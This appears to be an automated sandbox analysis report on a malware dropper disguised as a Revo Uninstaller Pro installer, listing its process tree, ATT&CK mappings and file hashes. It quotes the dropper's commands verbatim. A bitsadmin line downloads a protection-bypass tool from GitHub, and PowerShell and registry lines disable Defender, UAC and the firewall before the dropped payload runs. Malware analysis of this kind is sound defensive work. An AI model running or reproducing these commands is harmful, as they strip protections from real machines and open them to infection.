pid Process 4540 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp 4540 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp 3340 Revo Uninstaller Pro 4.2.3.tmp 3340 Revo Uninstaller Pro 4.2.3.tmp 1572 powershell.exe 1572 powershell.exe 4312 powershell.exe 4312 powershell.exe 4692 powershell.exe 4692 powershell.exe 636 powershell.exe 636 powershell.exe 1200 powershell.exe 1200 powershell.exe 3856 powershell.exe 3856 powershell.exe 964 powershell.exe 964 powershell.exe 1136 powershell.exe 1136 powershell.exe 2932 powershell.exe 2932 powershell.exe 3340 Revo Uninstaller Pro 4.2.3.tmp 3340 Revo Uninstaller Pro 4.2.3.tmp 1520 powershell.exe 1520 powershell.exe 2012 powershell.exe 2012 powershell.exe 4072 powershell.exe 4072 powershell.exe 2880 powershell.exe 2880 powershell.exe 3464 powershell.exe 3464 powershell.exe 3996 powershell.exe 3996 powershell.exe 4692 powershell.exe 4692 powershell.exe 2248 powershell.exe 2248 powershell.exe 4612 111.exe 4612 111.exe 4612 111.exe 4612 111.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
description pid Process Token: SeDebugPrivilege 1572 powershell.exe Token: SeDebugPrivilege 4312 powershell.exe Token: SeDebugPrivilege 4692 powershell.exe Token: SeDebugPrivilege 636 powershell.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 3856 powershell.exe Token: SeDebugPrivilege 964 powershell.exe Token: SeDebugPrivilege 1136 powershell.exe Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeDebugPrivilege 3996 powershell.exe Token: SeDebugPrivilege 4692 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeRestorePrivilege 4008 7z.exe Token: 35 4008 7z.exe Token: SeSecurityPrivilege 4008 7z.exe Token: SeSecurityPrivilege 4008 7z.exe Token: SeRestorePrivilege 1872 7z.exe Token: 35 1872 7z.exe Token: SeSecurityPrivilege 1872 7z.exe Token: SeSecurityPrivilege 1872 7z.exe Token: SeRestorePrivilege 1520 7z.exe Token: 35 1520 7z.exe Token: SeSecurityPrivilege 1520 7z.exe Token: SeSecurityPrivilege 1520 7z.exe Token: SeDebugPrivilege 4612 111.exe -
Suspicious use of FindShellTrayWindow 22 IoCs
pid Process 4540 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp 3340 Revo Uninstaller Pro 4.2.3.tmp 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe -
Suspicious use of SendNotifyMessage 20 IoCs
pid Process 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3380 RevoUninPro.exe 3380 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe 4644 RevoUninPro.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4092 wrote to memory of 4540 4092 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe 82 PID 4092 wrote to memory of 4540 4092 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe 82 PID 4092 wrote to memory of 4540 4092 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe 82 PID 4540 wrote to memory of 4852 4540 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp 83 PID 4540 wrote to memory of 4852 4540 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp 83 PID 4540 wrote to memory of 4852 4540 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp 83 PID 4540 wrote to memory of 3948 4540 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp 84 PID 4540 wrote to memory of 3948 4540 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp 84 PID 4540 wrote to memory of 3948 4540 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp 84 PID 4852 wrote to memory of 4616 4852 WScript.exe 85 PID 4852 wrote to memory of 4616 4852 WScript.exe 85 PID 4852 wrote to memory of 4616 4852 WScript.exe 85 PID 3948 wrote to memory of 3340 3948 Revo Uninstaller Pro 4.2.3.exe 87 PID 3948 wrote to memory of 3340 3948 Revo Uninstaller Pro 4.2.3.exe 87 PID 3948 wrote to memory of 3340 3948 Revo Uninstaller Pro 4.2.3.exe 87 PID 4616 wrote to memory of 3704 4616 cmd.exe 88 PID 4616 wrote to memory of 3704 4616 cmd.exe 88 PID 4616 wrote to memory of 3704 4616 cmd.exe 88 PID 4616 wrote to memory of 5076 4616 cmd.exe 89 PID 4616 wrote to memory of 5076 4616 cmd.exe 89 PID 4616 wrote to memory of 5076 4616 cmd.exe 89 PID 4616 wrote to memory of 1572 4616 cmd.exe 91 PID 4616 wrote to memory of 1572 4616 cmd.exe 91 PID 4616 wrote to memory of 1572 4616 cmd.exe 91 PID 4616 wrote to memory of 4312 4616 cmd.exe 96 PID 4616 wrote to memory of 4312 4616 cmd.exe 96 PID 4616 wrote to memory of 4312 4616 cmd.exe 96 PID 4616 wrote to memory of 4692 4616 cmd.exe 98 PID 4616 wrote to memory of 4692 4616 cmd.exe 98 PID 4616 wrote to memory of 4692 4616 cmd.exe 98 PID 4616 wrote to memory of 636 4616 cmd.exe 99 PID 4616 wrote to memory of 636 4616 cmd.exe 99 PID 4616 wrote to memory of 636 4616 cmd.exe 99 PID 4616 wrote to memory of 1200 4616 cmd.exe 102 PID 4616 wrote to memory of 1200 4616 cmd.exe 102 PID 4616 wrote to memory of 1200 4616 cmd.exe 102 PID 4616 wrote to memory of 3856 4616 cmd.exe 103 PID 4616 wrote to memory of 3856 4616 cmd.exe 103 PID 4616 wrote to memory of 3856 4616 cmd.exe 103 PID 4616 wrote to memory of 964 4616 cmd.exe 104 PID 4616 wrote to memory of 964 4616 cmd.exe 104 PID 4616 wrote to memory of 964 4616 cmd.exe 104 PID 4616 wrote to memory of 1136 4616 cmd.exe 105 PID 4616 wrote to memory of 1136 4616 cmd.exe 105 PID 4616 wrote to memory of 1136 4616 cmd.exe 105 PID 4616 wrote to memory of 2932 4616 cmd.exe 106 PID 4616 wrote to memory of 2932 4616 cmd.exe 106 PID 4616 wrote to memory of 2932 4616 cmd.exe 106 PID 4616 wrote to memory of 1520 4616 cmd.exe 107 PID 4616 wrote to memory of 1520 4616 cmd.exe 107 PID 4616 wrote to memory of 1520 4616 cmd.exe 107 PID 4616 wrote to memory of 2012 4616 cmd.exe 108 PID 4616 wrote to memory of 2012 4616 cmd.exe 108 PID 4616 wrote to memory of 2012 4616 cmd.exe 108 PID 3340 wrote to memory of 708 3340 Revo Uninstaller Pro 4.2.3.tmp 109 PID 3340 wrote to memory of 708 3340 Revo Uninstaller Pro 4.2.3.tmp 109 PID 708 wrote to memory of 968 708 rundll32.exe 110 PID 708 wrote to memory of 968 708 rundll32.exe 110 PID 968 wrote to memory of 3264 968 runonce.exe 112 PID 968 wrote to memory of 3264 968 runonce.exe 112 PID 4616 wrote to memory of 4072 4616 cmd.exe 113 PID 4616 wrote to memory of 4072 4616 cmd.exe 113 PID 4616 wrote to memory of 4072 4616 cmd.exe 113 PID 3340 wrote to memory of 1040 3340 Revo Uninstaller Pro 4.2.3.tmp 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp"C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp" /SL5="$C0060,18996440,788992,C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f5⤵
- System Location Discovery: System Language Discovery
PID:3704
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe5⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:5076
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3856
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4924
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\main.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:2236 -
C:\Windows\SysWOW64\mode.commode 65,105⤵
- System Location Discovery: System Language Discovery
PID:4264
-
-
C:\ProgramData\uzlyLtM20yixSdV\7z.exe7z.exe e file.zip -p___________5028pwd2533pwd24016___________ -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
C:\ProgramData\uzlyLtM20yixSdV\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
C:\ProgramData\uzlyLtM20yixSdV\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\ProgramData\uzlyLtM20yixSdV\111.exe"111.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612 -
C:\ProgramData\uzlyLtM20yixSdV\111.exe"C:\ProgramData\uzlyLtM20yixSdV\111.exe"6⤵
- Executes dropped EXE
PID:4760
-
-
C:\ProgramData\uzlyLtM20yixSdV\111.exe"C:\ProgramData\uzlyLtM20yixSdV\111.exe"6⤵
- Executes dropped EXE
PID:64
-
-
C:\ProgramData\uzlyLtM20yixSdV\111.exe"C:\ProgramData\uzlyLtM20yixSdV\111.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2752
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:3948 -
C:\Windows\SysWOW64\timeout.exetimeout /T 180 /NOBREAK5⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1028
-
-
-
-
C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp"C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$3024A,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\system32\rundll32.exe"rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf5⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Windows\system32\runonce.exe"C:\Windows\system32\runonce.exe" -r6⤵
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\System32\grpconv.exe"C:\Windows\System32\grpconv.exe" -o7⤵PID:3264
-
-
-
-
C:\Windows\system32\regsvr32.exe"regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s5⤵
- Loads dropped DLL
- Modifies system executable filetype association
- Modifies registry class
PID:1040
-
-
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2596
-
-
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3380
-
-
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4644
-
-
-
-
-
C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exeC:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1184
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
3Change Default File Association
1Component Object Model Hijacking
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
3Change Default File Association
1Component Object Model Hijacking
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1BITS Jobs
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14.2MB
MD5dc21d689cfa1860e8820ed0ee45b1f2a
SHA1acf2db6df76114601a2e58097629e0c8cbce129b
SHA25601732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c
SHA512a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140
-
Filesize
188KB
MD575d7bf3468669a6c3df6f4d048315128
SHA1678d3b531738573520367b47c0cd52cf5e431fa0
SHA256927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae
SHA5129c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e
-
Filesize
23.7MB
MD5ddb041550a3e69764cd9d7d3de3636f3
SHA11ad9b13a6627c1e6f258951965e39ba9cfd9cb1c
SHA25654e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975
SHA51200498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800
-
Filesize
111KB
MD5c37fb8c46d0281dd27768fd1101614f0
SHA103e736a49687f9ac10b35cc791e7df5b7e55f4d8
SHA256ee2e68e61821054a1946efd0260f7e70c3f338765d04edca7625d05677fd980c
SHA512b074f71e06c38f484573edde490f85792ada589e953e96d64188461f41e8ca4d0a90a6fc081ec36e4dc0067337abeea567c40b4e4fd89522497b1ba735262776
-
Filesize
114KB
MD56c9dbe894ea20eb190db6b483f17030d
SHA11bac02001cba8c083b987264f1bb89b05b74155f
SHA25624ffc231de9a4573b4ae743555c43dcc550ff8455ea681c788e50bda03a3a846
SHA512b0941e0026ba9117d3cf846e89723dede9f9a00dde688dbf90715244cfdc38b75b579e1c02c788626b16cb6875934341fd2acb685c145389ccd629df9355f62a
-
Filesize
2KB
MD5edc78deb34de240c787b1011161e9a4e
SHA12d31275530dce33d3bc329991c8ad59e1b303577
SHA25669569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b
SHA512e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b
-
Filesize
9.6MB
MD51dd8459f2595e4c0603ad491590f6952
SHA1607efe3c74388fb1e4b19f8f7ed2520ebfc349a1
SHA2565bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d
SHA512c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d
-
Filesize
64KB
MD58462a9b69c76a9603a4143d51fbc201e
SHA14473590f93f94f22c340a354516191c3c0ba6532
SHA256fe4bcb4251f77375119a936c80fb36221af0c5105e840e2e115d47f96cb437c8
SHA5122f02ecdb06760a093f4d8e6f04c97138695b064db8cb2dcc4af9b47c829852f38b77be9425eb2f3e3e36f85da181c116c829921fa35ae68afc57c728d5393570
-
Filesize
96KB
MD5c84933bcccf41369ef9ecce015b86ed0
SHA1624713276ae217d8d05c03598eecd31209c7f77a
SHA256ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679
SHA512221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
22KB
MD5b0a7842dd51df8942bc8b837282d1c2b
SHA10e9432597657c28ca9ac766ac7bf0a903d6aeb3b
SHA2564a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8
SHA512b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6
-
Filesize
111B
MD5308ba58a50ffa9eabd31fdba79af6dd1
SHA129c09164facb6419f9d7f9e103f7e13bed4743a1
SHA2560ef02b5ebb5f59c70722fc29651ad48a49b2b4d87f33416b1b06c8a038475243
SHA512674edfeacf8c6e606a80187f95dc16abcc0804f18c2b2e81734cf4f7e6d1f68e9db5827f18107c0882506aba47485665471c37acd2b9ad50ca075eb083a9582f
-
Filesize
1.2MB
MD5618155a1c0479bc80c4bd28b7af93162
SHA1542bf77b03bbdc5cc5caf0582b39cdc185e686f6
SHA256ea712e9759d73168f605f8a55771d4aef62b0bef4b45cb8fd68ed11ea11c2fb4
SHA512b870452ce96985e431789c2497f4fa46194ce1bf56463e1dc99b98513236b8b01228ec08c734a6c6af739ee00cb715a6cd8a62382febab4678a1055c34d5a461
-
Filesize
2.0MB
MD53b9f43ca28acf55c64c9aa1ceb46c2d7
SHA17e30f2fde7a55b2023b03231993d66ea48513083
SHA256ef08bdd7b11c188b1c0d0138dc9030fd3a2923512f983623bbdd34e55d95e50f
SHA51258dece7172478fc948020de1dd67939331f0db1191b2583fa421406ba8d5d5a1907e2989447813ca1f0fdc0b9248e8bdb31db241f78e2b3f12d64f5c49f7d0a2
-
Filesize
995KB
MD5c28ab5e6ae8588e03b92c24b14d12fef
SHA1801c88fb58288fa2d54cf7584a089d6c50c02bb8
SHA256ec59673a06768a14aed715995de14d34af211af5a4534059b5e22ab314a447a2
SHA512a3f51f254166caba5664d5aca331142d481a60c803de8d69d5d278b1c74bcf2b312b07fd1e46e380ff3954f4e104674081fe3ceaa782b178adfab9226fe83442
-
Filesize
2.4MB
MD5b935bb028c9e072364d33b5e482b93c9
SHA163a89514cfd0a64fc7a1fbcd5bd91f0c350a212b
SHA2565d55c036145879b4e92a9bd1862ff15c83954469bf96ce7cc8afbd6229d21845
SHA512a41c488f634d117dcee8aaf5de8bbf9463ae39be1b85aa12355cbec9f275085c44c3ed654e214fbbde8a51c260627c105b1902aebb66e0129f3c11d699de53bc
-
Filesize
2.4MB
MD53ba604f3bc038fae6d7d70df18a95e8d
SHA1f8553490c0063dba7d0e69b9e688d9abfec98314
SHA2565077f9091c91a13eb822227b0a4e9a2f277542eec22910f794a44606fea16af5
SHA5123144a0fb0ffc02e2cf35bffad36b42a76c6f7edd3089eeac884bb742278a68245143da981d54b9e0c026778bdf9ca38d19ea69c09e206e86defbd17427d1f642
-
Filesize
386B
MD51376349b5831fe5760106870cd5bad6d
SHA1cf6ff2d17e597893a61fedfd4fe90748ab2349e1
SHA25667fc2976cfc997cc5d0e74a45ba3fe44c486e3f57e92a9b77cfd4d55199c1872
SHA51264af4f7e513b6e860757293f0dd92100f17121f10d9c75c72c8ff9bea1144eda55c62be6b16a158b513828cdc3e3c5a355382062d975673617f020a5e10d99b8
-
Filesize
2KB
